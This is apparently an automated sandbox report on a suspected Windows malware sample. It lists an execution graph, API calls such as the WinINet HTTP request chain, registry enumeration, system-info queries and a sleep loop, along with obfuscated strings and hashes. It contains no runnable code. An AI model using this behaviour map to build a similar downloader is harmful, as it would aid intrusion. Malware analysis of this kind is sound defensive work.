                        execution_graph 12975 f86559 12976 f863f7 __cftof 2 API calls 12975->12976 12977 f8656a 12976->12977 12841 f586b0 12842 f586b6 12841->12842 12843 f586d6 12842->12843 12844 f866e7 2 API calls 12842->12844 12845 f586d0 12844->12845 12922 f5e410 12924 f5e419 12922->12924 12925 f5e435 12922->12925 12924->12925 12926 f5e270 12924->12926 12927 f5e280 __dosmaperr 12926->12927 12928 f88979 2 API calls 12927->12928 12929 f5e2bd std::_Xinvalid_argument 12928->12929 12930 f5e270 2 API calls 12929->12930 12931 f5e435 12929->12931 12930->12929 12931->12924 12961 f5dfd0 recv 12962 f5e032 recv 12961->12962 12963 f5e067 recv 12962->12963 12964 f5e0a1 12963->12964 12965 f5e1c3 12964->12965 12966 f6c5dc GetSystemTimePreciseAsFileTime 12964->12966 12967 f5e1fe 12966->12967 12968 f6c19a 7 API calls 12967->12968 12969 f5e268 12968->12969 12611 f61dd0 12614 f61e6b shared_ptr __dosmaperr 12611->12614 12612 f5e440 5 API calls 12613 f62936 shared_ptr std::_Xinvalid_argument 12612->12613 12614->12613 12621 f61e78 12614->12621 12626 f88979 12614->12626 12617 f62265 shared_ptr 12617->12613 12617->12621 12630 f866e7 12617->12630 12618 f6268b shared_ptr __dosmaperr 12618->12613 12619 f88979 2 API calls 12618->12619 12620 f62759 12619->12620 12620->12613 12620->12621 12622 f627d1 12620->12622 12621->12612 12634 f5e440 12622->12634 12624 f62843 12624->12613 12650 f55df0 12624->12650 12627 f88994 12626->12627 12657 f886d7 12627->12657 12629 f8899e 12629->12617 12631 f866f3 12630->12631 12633 f866fd __cftof __dosmaperr 12631->12633 12681 f86670 12631->12681 12633->12618 12635 f5e489 12634->12635 12704 f5bd60 12635->12704 12637 f5e9a9 shared_ptr 12637->12624 12638 f5e711 12638->12637 12639 f5e440 5 API calls 12638->12639 12641 f5f696 12639->12641 12640 f5f892 shared_ptr 12640->12624 12641->12640 12642 f5e440 5 API calls 12641->12642 12644 f5f973 12642->12644 12643 f5fa45 shared_ptr 12643->12624 12644->12643 12645 f5e440 5 API calls 12644->12645 12647 f6054c 12645->12647 12646 f60790 shared_ptr 12646->12624 12647->12646 12648 f5e440 5 API calls 12647->12648 12649 f611f9 12648->12649 12652 f55e28 12650->12652 12651 f55f0e shared_ptr 12651->12613 12652->12651 12653 f56060 RegOpenKeyExA 12652->12653 12654 f5645a shared_ptr 12653->12654 12656 f560b3 __cftof 12653->12656 12654->12613 12655 f56153 RegEnumValueW 12655->12656 12656->12654 12656->12655 12658 f886e9 12657->12658 12659 f8683a __cftof 2 API calls 12658->12659 12660 f886fe __cftof __dosmaperr 12658->12660 12662 f8872e 12659->12662 12660->12629 12662->12660 12663 f88925 12662->12663 12664 f88962 12663->12664 12665 f88932 12663->12665 12674 f8d2e9 12664->12674 12666 f88941 __fassign 12665->12666 12669 f8d30d 12665->12669 12666->12662 12670 f8683a __cftof 2 API calls 12669->12670 12671 f8d32a 12670->12671 12673 f8d33a 12671->12673 12678 f8f07f 12671->12678 12673->12666 12675 f8d2f4 12674->12675 12676 f8b4bb __cftof 2 API calls 12675->12676 12677 f8d304 12676->12677 12677->12666 12679 f8683a __cftof 2 API calls 12678->12679 12680 f8f09f __cftof __fassign __freea 12679->12680 12680->12673 12682 f86692 12681->12682 12684 f8667d __cftof __dosmaperr ___free_lconv_mon 12681->12684 12682->12684 12685 f89ef9 12682->12685 12684->12633 12686 f89f11 12685->12686 12688 f89f36 12685->12688 12686->12688 12689 f902f8 12686->12689 12688->12684 12690 f90304 12689->12690 12692 f9030c __cftof __dosmaperr 12690->12692 12693 f903ea 12690->12693 12692->12688 12694 f90410 __cftof __dosmaperr 12693->12694 12695 f9040c 12693->12695 12694->12692 12695->12694 12697 f8fb7f 12695->12697 12698 f8fbcc 12697->12698 12699 f8683a __cftof 2 API calls 12698->12699 12703 f8fbdb __cftof 12699->12703 12700 f8fe7b 12700->12694 12701 f8d2e9 2 API calls 12701->12703 12702 f8c4ea GetPEB GetPEB __fassign 12702->12703 12703->12700 12703->12701 12703->12702 12705 f5c14e shared_ptr 12704->12705 12706 f5bdb2 12704->12706 12705->12638 12706->12705 12707 f5bdc6 InternetOpenW InternetConnectA 12706->12707 12708 f5be3d 12707->12708 12709 f5be53 HttpOpenRequestA 12708->12709 12710 f5be71 shared_ptr 12709->12710 12711 f5bf13 HttpSendRequestA 12710->12711 12713 f5bf2b shared_ptr 12711->12713 12712 f5bfb3 InternetReadFile 12714 f5bfda 12712->12714 12713->12712 13068 f69310 13069 f69363 13068->13069 13070 f69325 13068->13070 13071 f6d041 SleepConditionVariableCS 13070->13071 13072 f6932f 13071->13072 13072->13069 13073 f6cff7 RtlWakeAllConditionVariable 13072->13073 13073->13069 12846 f6b85e 12851 f6b6e5 12846->12851 12848 f6b886 12859 f6b648 12848->12859 12850 f6b89f 12852 f6b6f1 Concurrency::details::_Reschedule_chore 12851->12852 12853 f6b722 12852->12853 12869 f6c5dc 12852->12869 12853->12848 12857 f6b70c __Mtx_unlock 12858 f52ad0 7 API calls 12857->12858 12858->12853 12861 f6b654 Concurrency::details::_Reschedule_chore 12859->12861 12860 f6b6ae 12860->12850 12861->12860 12862 f6c5dc GetSystemTimePreciseAsFileTime 12861->12862 12863 f6b669 12862->12863 12864 f52ad0 7 API calls 12863->12864 12865 f6b66f __Mtx_unlock 12864->12865 12866 f52ad0 7 API calls 12865->12866 12867 f6b68c __Cnd_broadcast 12866->12867 12867->12860 12868 f52ad0 7 API calls 12867->12868 12868->12860 12877 f6c382 12869->12877 12871 f6b706 12872 f52ad0 12871->12872 12873 f52adc 12872->12873 12874 f52ada 12872->12874 12894 f6c19a 12873->12894 12874->12857 12878 f6c3d8 12877->12878 12880 f6c3aa 12877->12880 12878->12880 12883 f6ce9b 12878->12883 12880->12871 12881 f6c42d __Xtime_diff_to_millis2 12881->12880 12882 f6ce9b _xtime_get GetSystemTimePreciseAsFileTime 12881->12882 12882->12881 12884 f6ceaa 12883->12884 12886 f6ceb7 __aulldvrm 12883->12886 12884->12886 12887 f6ce74 12884->12887 12886->12881 12890 f6cb1a 12887->12890 12891 f6cb37 12890->12891 12892 f6cb2b GetSystemTimePreciseAsFileTime 12890->12892 12891->12886 12892->12891 12895 f6c1c2 12894->12895 12897 f6c1a4 12894->12897 12895->12895 12897->12895 12898 f6c1c7 12897->12898 12901 f52aa0 12898->12901 12900 f6c1de std::_Throw_future_error 12900->12897 12915 f6be0f 12901->12915 12903 f52abf 12903->12900 12904 f88aaf __cftof 2 API calls 12905 f86c26 12904->12905 12906 f86c43 12905->12906 12907 f86c35 12905->12907 12909 f868bd 2 API calls 12906->12909 12908 f86c99 6 API calls 12907->12908 12911 f86c3f 12908->12911 12912 f86c5d 12909->12912 12910 f52ab4 12910->12903 12910->12904 12911->12900 12913 f86c99 6 API calls 12912->12913 12914 f86c71 ___free_lconv_mon 12912->12914 12913->12914 12914->12900 12918 f6cb61 12915->12918 12919 f6cb6f InitOnceExecuteOnce 12918->12919 12921 f6be22 12918->12921 12919->12921 12921->12910 12970 f86974 12971 f8698c 12970->12971 12972 f86982 12970->12972 12973 f868bd 2 API calls 12971->12973 12974 f869a6 ___free_lconv_mon 12973->12974 12483 f86beb 12486 f86bf7 12483->12486 12485 f86c26 12487 f86c43 12485->12487 12488 f86c35 12485->12488 12495 f88aaf 12486->12495 12501 f868bd 12487->12501 12489 f86c99 6 API calls 12488->12489 12491 f86c3f 12489->12491 12492 f86c5d 12494 f86c71 ___free_lconv_mon 12492->12494 12504 f86c99 12492->12504 12496 f88ab4 __cftof 12495->12496 12499 f88abf 12496->12499 12516 f8d4f4 12496->12516 12513 f8651d 12499->12513 12500 f88af2 __cftof __dosmaperr 12500->12485 12533 f8683a 12501->12533 12503 f868cf 12503->12492 12505 f86cc4 __cftof 12504->12505 12511 f86ca7 __cftof __dosmaperr 12504->12511 12506 f86d06 CreateFileW 12505->12506 12512 f86cea __cftof __dosmaperr 12505->12512 12507 f86d38 12506->12507 12508 f86d2a 12506->12508 12581 f86d77 12507->12581 12569 f86e01 GetFileType 12508->12569 12511->12494 12512->12494 12521 f863f7 12513->12521 12517 f8d500 __cftof 12516->12517 12518 f8651d __cftof 2 API calls 12517->12518 12519 f8d55c __cftof __dosmaperr 12517->12519 12520 f8d6ee __cftof __dosmaperr 12518->12520 12519->12499 12520->12499 12522 f86405 __cftof 12521->12522 12523 f86450 12522->12523 12526 f8645b 12522->12526 12523->12500 12531 f8a1c2 GetPEB 12526->12531 12528 f86465 12529 f8646a GetPEB 12528->12529 12530 f8647a __cftof 12528->12530 12529->12530 12532 f8a1dc __cftof 12531->12532 12532->12528 12534 f8685a 12533->12534 12538 f86851 12533->12538 12534->12538 12539 f8b4bb 12534->12539 12538->12503 12540 f8b4ce 12539->12540 12541 f86890 12539->12541 12540->12541 12547 f8f46b 12540->12547 12543 f8b4e8 12541->12543 12544 f8b4fb 12543->12544 12545 f8b510 12543->12545 12544->12545 12552 f8e571 12544->12552 12545->12538 12548 f8f477 __cftof 12547->12548 12549 f8f4c6 12548->12549 12550 f88aaf __cftof 2 API calls 12548->12550 12549->12541 12551 f8f4eb 12550->12551 12553 f8e57b 12552->12553 12556 f8e489 12553->12556 12555 f8e581 12555->12545 12560 f8e495 __cftof ___free_lconv_mon 12556->12560 12557 f8e4b6 12557->12555 12558 f88aaf __cftof 2 API calls 12559 f8e528 12558->12559 12561 f8e564 12559->12561 12565 f8a5ee 12559->12565 12560->12557 12560->12558 12561->12555 12566 f8a611 12565->12566 12567 f88aaf __cftof 2 API calls 12566->12567 12568 f8a687 12567->12568 12570 f86e3c __cftof 12569->12570 12573 f86ed2 __dosmaperr 12569->12573 12571 f86e75 GetFileInformationByHandle 12570->12571 12570->12573 12572 f86e8b 12571->12572 12571->12573 12586 f870c9 12572->12586 12573->12512 12577 f86ea8 12578 f86f71 SystemTimeToTzSpecificLocalTime 12577->12578 12579 f86ebb 12578->12579 12580 f86f71 SystemTimeToTzSpecificLocalTime 12579->12580 12580->12573 12582 f86d85 12581->12582 12583 f86d8a __dosmaperr 12582->12583 12584 f870c9 2 API calls 12582->12584 12583->12512 12585 f86da3 12584->12585 12585->12512 12588 f870df _wcsrchr 12586->12588 12587 f86e97 12596 f86f71 12587->12596 12588->12587 12600 f8b9e4 12588->12600 12590 f87123 12590->12587 12591 f8b9e4 2 API calls 12590->12591 12592 f87134 12591->12592 12592->12587 12593 f8b9e4 2 API calls 12592->12593 12594 f87145 12593->12594 12594->12587 12595 f8b9e4 2 API calls 12594->12595 12595->12587 12597 f86f89 12596->12597 12598 f86f8f 12597->12598 12599 f86fa9 SystemTimeToTzSpecificLocalTime 12597->12599 12598->12577 12599->12598 12601 f8b9f2 12600->12601 12604 f8b9f8 __cftof __dosmaperr 12601->12604 12605 f8ba2d 12601->12605 12603 f8ba28 12603->12590 12604->12590 12606 f8ba57 12605->12606 12609 f8ba3d __cftof __dosmaperr 12605->12609 12607 f8683a __cftof 2 API calls 12606->12607 12606->12609 12610 f8ba81 12607->12610 12608 f8b9a5 GetPEB GetPEB 12608->12610 12609->12603 12610->12608 12610->12609 12932 f57400 12933 f57435 shared_ptr 12932->12933 12937 f5752f shared_ptr 12933->12937 12938 f6d041 12933->12938 12935 f575bd 12935->12937 12942 f6cff7 12935->12942 12940 f6d052 12938->12940 12939 f6d05a 12939->12935 12940->12939 12946 f6d0c9 12940->12946 12943 f6d006 12942->12943 12944 f6d0af 12943->12944 12945 f6d0ab RtlWakeAllConditionVariable 12943->12945 12944->12937 12945->12937 12947 f6d0d7 SleepConditionVariableCS 12946->12947 12949 f6d0f0 12946->12949 12947->12949 12949->12940 12715 f66ae0 12716 f66b10 12715->12716 12719 f646c0 12716->12719 12718 f66b5c Sleep 12718->12716 12722 f646fb 12719->12722 12736 f64d80 shared_ptr 12719->12736 12720 f64e69 shared_ptr 12720->12718 12723 f5bd60 5 API calls 12722->12723 12722->12736 12734 f64753 shared_ptr __dosmaperr 12723->12734 12724 f64f25 shared_ptr 12725 f64fee shared_ptr 12724->12725 12729 f66ab6 12724->12729 12755 f57d00 12725->12755 12727 f64ffd 12761 f582b0 12727->12761 12730 f646c0 13 API calls 12729->12730 12733 f66b5c Sleep 12730->12733 12731 f64a0d 12732 f5bd60 5 API calls 12731->12732 12731->12736 12737 f64a72 shared_ptr 12732->12737 12733->12729 12734->12731 12735 f88979 2 API calls 12734->12735 12735->12731 12736->12720 12747 f565b0 12736->12747 12737->12736 12740 f642a0 12737->12740 12739 f65016 shared_ptr 12739->12718 12741 f642e2 12740->12741 12742 f64556 12741->12742 12745 f64308 shared_ptr 12741->12745 12744 f63550 11 API calls 12742->12744 12743 f64520 shared_ptr 12743->12736 12744->12743 12745->12743 12765 f63550 12745->12765 12748 f5660f 12747->12748 12749 f52280 2 API calls 12748->12749 12750 f56699 shared_ptr 12749->12750 12751 f52280 2 API calls 12750->12751 12752 f56822 shared_ptr 12750->12752 12753 f56727 shared_ptr 12751->12753 12752->12724 12753->12752 12754 f52280 2 API calls 12753->12754 12754->12753 12756 f57d66 shared_ptr __cftof 12755->12756 12757 f57ea3 GetNativeSystemInfo 12756->12757 12758 f57ea7 12756->12758 12760 f57eb8 shared_ptr 12756->12760 12757->12758 12758->12760 12838 f88a81 12758->12838 12760->12727 12764 f58315 shared_ptr __cftof 12761->12764 12762 f58454 GetNativeSystemInfo 12763 f58333 12762->12763 12763->12739 12764->12762 12764->12763 12766 f6358f shared_ptr 12765->12766 12773 f63ab2 shared_ptr std::_Xinvalid_argument 12765->12773 12771 f638f5 shared_ptr __dosmaperr 12766->12771 12766->12773 12776 f5aca0 12766->12776 12767 f88979 2 API calls 12769 f63a8a 12767->12769 12770 f63e52 12769->12770 12769->12773 12774 f63b9d 12769->12774 12796 f62e20 12770->12796 12771->12767 12771->12773 12773->12745 12781 f61dd0 12774->12781 12778 f5adf0 __cftof 12776->12778 12777 f5ae16 shared_ptr 12777->12771 12778->12777 12811 f55500 12778->12811 12780 f5af7e 12784 f61e6b shared_ptr __dosmaperr 12781->12784 12782 f5e440 5 API calls 12783 f62936 shared_ptr std::_Xinvalid_argument 12782->12783 12783->12773 12784->12783 12785 f88979 2 API calls 12784->12785 12791 f61e78 12784->12791 12787 f62265 shared_ptr 12785->12787 12786 f866e7 2 API calls 12788 f6268b shared_ptr __dosmaperr 12786->12788 12787->12783 12787->12786 12787->12791 12788->12783 12789 f88979 2 API calls 12788->12789 12790 f62759 12789->12790 12790->12783 12790->12791 12792 f627d1 12790->12792 12791->12782 12793 f5e440 5 API calls 12792->12793 12794 f62843 12793->12794 12794->12783 12795 f55df0 2 API calls 12794->12795 12795->12783 12797 f62ec5 __cftof 12796->12797 12798 f632f2 InternetCloseHandle InternetCloseHandle 12797->12798 12799 f63331 12798->12799 12800 f5e440 5 API calls 12799->12800 12802 f63423 shared_ptr 12800->12802 12801 f6351a shared_ptr std::_Xinvalid_argument 12801->12773 12802->12801 12804 f5aca0 2 API calls 12802->12804 12807 f638f5 shared_ptr __dosmaperr 12802->12807 12803 f88979 2 API calls 12805 f63a8a 12803->12805 12804->12807 12805->12801 12806 f63e52 12805->12806 12809 f63b9d 12805->12809 12808 f62e20 9 API calls 12806->12808 12807->12801 12807->12803 12808->12801 12810 f61dd0 9 API calls 12809->12810 12810->12801 12812 f55520 12811->12812 12814 f55620 12812->12814 12815 f52280 12812->12815 12814->12780 12818 f52240 12815->12818 12819 f52256 12818->12819 12822 f88667 12819->12822 12825 f87456 12822->12825 12824 f52264 12824->12812 12826 f87496 12825->12826 12830 f8747e __cftof __dosmaperr 12825->12830 12827 f8683a __cftof 2 API calls 12826->12827 12826->12830 12828 f874ae 12827->12828 12831 f87a11 12828->12831 12830->12824 12833 f87a22 12831->12833 12832 f87a31 __cftof __dosmaperr 12832->12830 12833->12832 12834 f87fb5 GetPEB GetPEB 12833->12834 12835 f87c0f GetPEB GetPEB 12833->12835 12836 f87c35 GetPEB GetPEB 12833->12836 12837 f87d83 GetPEB GetPEB 12833->12837 12834->12833 12835->12833 12836->12833 12837->12833 12839 f886d7 2 API calls 12838->12839 12840 f88a9f 12839->12840 12840->12760 12978 f6a140 12979 f6a1c0 12978->12979 12985 f67040 12979->12985 12981 f6a1fc shared_ptr 12982 f6a3ee shared_ptr 12981->12982 12989 f53ea0 12981->12989 12984 f6a3d6 12986 f67081 __cftof __Mtx_init_in_situ 12985->12986 12987 f672b6 12986->12987 12995 f52e80 12986->12995 12987->12981 12990 f53ede 12989->12990 12991 f53f08 12989->12991 12990->12984 12992 f53f18 12991->12992 13038 f52bc0 12991->13038 12992->12984 12996 f52ec6 12995->12996 12999 f52f2f 12995->12999 12997 f6c5dc GetSystemTimePreciseAsFileTime 12996->12997 12998 f52ed2 12997->12998 13001 f52fde 12998->13001 13004 f52edd __Mtx_unlock 12998->13004 13000 f52faf 12999->13000 13006 f6c5dc GetSystemTimePreciseAsFileTime 12999->13006 13000->12987 13002 f6c19a 7 API calls 13001->13002 13003 f52fe4 13002->13003 13005 f6c19a 7 API calls 13003->13005 13004->12999 13004->13003 13007 f52f79 13005->13007 13006->13007 13008 f6c19a 7 API calls 13007->13008 13009 f52f80 __Mtx_unlock 13007->13009 13008->13009 13010 f6c19a 7 API calls 13009->13010 13011 f52f98 __Cnd_broadcast 13009->13011 13010->13011 13011->13000 13012 f6c19a 7 API calls 13011->13012 13013 f52ffc 13012->13013 13014 f6c5dc GetSystemTimePreciseAsFileTime 13013->13014 13021 f53040 shared_ptr __Mtx_unlock 13014->13021 13015 f53185 13016 f6c19a 7 API calls 13015->13016 13017 f5318b 13016->13017 13018 f6c19a 7 API calls 13017->13018 13019 f53191 13018->13019 13020 f6c19a 7 API calls 13019->13020 13022 f53153 __Mtx_unlock 13020->13022 13021->13015 13021->13017 13023 f53167 13021->13023 13026 f6c5dc GetSystemTimePreciseAsFileTime 13021->13026 13022->13023 13024 f6c19a 7 API calls 13022->13024 13023->12987 13025 f5319d 13024->13025 13027 f5311f 13026->13027 13027->13015 13027->13019 13027->13022 13029 f6bc7c 13027->13029 13032 f6baa2 13029->13032 13031 f6bc8c 13031->13027 13033 f6bacc 13032->13033 13034 f6ce9b _xtime_get GetSystemTimePreciseAsFileTime 13033->13034 13037 f6bad4 __Xtime_diff_to_millis2 13033->13037 13035 f6baff __Xtime_diff_to_millis2 13034->13035 13036 f6ce9b _xtime_get GetSystemTimePreciseAsFileTime 13035->13036 13035->13037 13036->13037 13037->13031 13039 f52bce 13038->13039 13045 f6b777 13039->13045 13041 f52c02 13042 f52c09 13041->13042 13051 f52c40 13041->13051 13042->12984 13044 f52c18 std::_Throw_future_error 13046 f6b784 13045->13046 13050 f6b7a3 Concurrency::details::_Reschedule_chore 13045->13050 13054 f6caa7 13046->13054 13048 f6b794 13048->13050 13056 f6b74e 13048->13056 13050->13041 13062 f6b72b 13051->13062 13053 f52c72 shared_ptr 13053->13044 13055 f6cac2 CreateThreadpoolWork 13054->13055 13055->13048 13057 f6b757 Concurrency::details::_Reschedule_chore 13056->13057 13060 f6ccfc 13057->13060 13059 f6b771 13059->13050 13061 f6cd11 TpPostWork 13060->13061 13061->13059 13063 f6b737 13062->13063 13064 f6b747 13062->13064 13063->13064 13066 f6c9a8 13063->13066 13064->13053 13067 f6c9bd TpReleaseWork 13066->13067 13067->13064 13074 f68700 13075 f6875a __cftof 13074->13075 13081 f69ae0 13075->13081 13077 f68784 13080 f6879c 13077->13080 13085 f543b0 13077->13085 13079 f68809 std::_Throw_future_error 13082 f69b15 13081->13082 13091 f52ca0 13082->13091 13084 f69b46 13084->13077 13086 f6be0f InitOnceExecuteOnce 13085->13086 13087 f543ca 13086->13087 13088 f543d1 13087->13088 13089 f86beb 6 API calls 13087->13089 13088->13079 13090 f543e4 13089->13090 13092 f52cdd 13091->13092 13093 f6be0f InitOnceExecuteOnce 13092->13093 13094 f52d06 13093->13094 13095 f52d11 13094->13095 13096 f52d48 13094->13096 13100 f6be27 13094->13100 13095->13084 13107 f52400 13096->13107 13101 f6be33 std::_Throw_future_error 13100->13101 13102 f6bea3 13101->13102 13103 f6be9a 13101->13103 13104 f52aa0 7 API calls 13102->13104 13110 f6bdaf 13103->13110 13106 f6be9f 13104->13106 13106->13096 13128 f6b506 13107->13128 13109 f52432 13111 f6cb61 InitOnceExecuteOnce 13110->13111 13112 f6bdc7 13111->13112 13113 f6bdce 13112->13113 13116 f86beb 13112->13116 13113->13106 13115 f6bdd7 13115->13106 13119 f86bf7 13116->13119 13117 f88aaf __cftof 2 API calls 13118 f86c26 13117->13118 13120 f86c43 13118->13120 13121 f86c35 13118->13121 13119->13117 13123 f868bd 2 API calls 13120->13123 13122 f86c99 6 API calls 13121->13122 13124 f86c3f 13122->13124 13125 f86c5d 13123->13125 13124->13115 13126 f86c99 6 API calls 13125->13126 13127 f86c71 ___free_lconv_mon 13125->13127 13126->13127 13127->13115 13129 f6b521 std::_Throw_future_error 13128->13129 13130 f88aaf __cftof 2 API calls 13129->13130 13132 f6b588 __cftof 13129->13132 13131 f6b5cf 13130->13131 13132->13109 12950 f6b7e9 12951 f6b6e5 8 API calls 12950->12951 12953 f6b811 Concurrency::details::_Reschedule_chore 12951->12953 12952 f6b836 12955 f6b648 8 API calls 12952->12955 12953->12952 12957 f6cade 12953->12957 12956 f6b84e 12955->12956 12958 f6cafc 12957->12958 12959 f6caec TpCallbackUnloadDllOnCompletion 12957->12959 12958->12952 12959->12958

                        Executed Functions

                        Function 00F5BD60 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 310networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 760 f5bd60-f5bdac 761 f5c1a1-f5c1c6 call f67f30 760->761 762 f5bdb2-f5bdb6 760->762 768 f5c1f4-f5c20c 761->768 769 f5c1c8-f5c1d4 761->769 762->761 764 f5bdbc-f5bdc0 762->764 764->761 766 f5bdc6-f5be4f InternetOpenW InternetConnectA call f67870 call f55b20 764->766 792 f5be51 766->792 793 f5be53-f5be6f HttpOpenRequestA 766->793 773 f5c212-f5c21e 768->773 774 f5c158-f5c170 768->774 771 f5c1d6-f5c1e4 769->771 772 f5c1ea-f5c1f1 call f6d593 769->772 771->772 778 f5c26f-f5c274 call f86b9a 771->778 772->768 780 f5c224-f5c232 773->780 781 f5c14e-f5c155 call f6d593 773->781 775 f5c176-f5c182 774->775 776 f5c243-f5c25f call f6cf21 774->776 782 f5c239-f5c240 call f6d593 775->782 783 f5c188-f5c196 775->783 780->778 789 f5c234 780->789 781->774 782->776 783->778 791 f5c19c 783->791 789->781 791->782 792->793 798 f5be71-f5be80 793->798 799 f5bea0-f5bf0f call f67870 call f55b20 call f67870 call f55b20 793->799 800 f5be96-f5be9d call f6d593 798->800 801 f5be82-f5be90 798->801 812 f5bf11 799->812 813 f5bf13-f5bf29 HttpSendRequestA 799->813 800->799 801->800 812->813 814 f5bf2b-f5bf3a 813->814 815 f5bf5a-f5bf82 813->815 816 f5bf50-f5bf57 call f6d593 814->816 817 f5bf3c-f5bf4a 814->817 818 f5bf84-f5bf93 815->818 819 f5bfb3-f5bfd4 InternetReadFile 815->819 816->815 817->816 822 f5bf95-f5bfa3 818->822 823 f5bfa9-f5bfb0 call f6d593 818->823 820 f5bfda 819->820 824 f5bfe0-f5c090 call f84180 820->824 822->823 823->819
                        APIs
                        • InternetOpenW.WININET(00FA8D68,00000000,00000000,00000000,00000000), ref: 00F5BDED
                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F5BE11
                        • HttpOpenRequestA.WININET(?,00000000), ref: 00F5BE5B
                        • HttpSendRequestA.WININET(?,00000000), ref: 00F5BF1B
                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 00F5BFCD
                        • InternetCloseHandle.WININET(?), ref: 00F5C0A7
                        • InternetCloseHandle.WININET(?), ref: 00F5C0AF
                        • InternetCloseHandle.WININET(?), ref: 00F5C0B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                        • String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$invalid stoi argument$stoi argument out of range$xn$n
                        • API String ID: 688256393-2251649307
                        • Opcode ID: bf4e34dea14339b78c420d0185a85859683801022b8eda36c31018f5e8f7efa6
                        • Instruction ID: 4c33a5e2b79ecc87f2590737ccd9783eab3ebf9f14fafbb5f71cebc7599bedab
                        • Opcode Fuzzy Hash: bf4e34dea14339b78c420d0185a85859683801022b8eda36c31018f5e8f7efa6
                        • Instruction Fuzzy Hash: 46B106B1A002189FEB24CF28CC84BADBB65EF45305F5041A9FA09972C2DB749EC4DF95
                        Function 00F646C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F67870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00F6795C
                          • Part of subcall function 00F67870: __Cnd_destroy_in_situ.LIBCPMT ref: 00F67968
                          • Part of subcall function 00F67870: __Mtx_destroy_in_situ.LIBCPMT ref: 00F67971
                          • Part of subcall function 00F5BD60: InternetOpenW.WININET(00FA8D68,00000000,00000000,00000000,00000000), ref: 00F5BDED
                          • Part of subcall function 00F5BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F5BE11
                          • Part of subcall function 00F5BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00F5BE5B
                        • std::_Xinvalid_argument.LIBCPMT ref: 00F64EA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                        • String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range
                        • API String ID: 2414744145-1285461467
                        • Opcode ID: 8666145a33ae0b571204db0136686020c2ee26f2f055f30cac60b5f5d1cf03a2
                        • Instruction ID: f5c499a20033df799cbbb4f1e72f006cddebe0f7db0c379826e38d837917f1ee
                        • Opcode Fuzzy Hash: 8666145a33ae0b571204db0136686020c2ee26f2f055f30cac60b5f5d1cf03a2
                        • Instruction Fuzzy Hash: 66231871E001589BEB19DB28CD8979DBB769F81308F5482DCE009AB2D2DB399F84DF51
                        Function 00F55DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
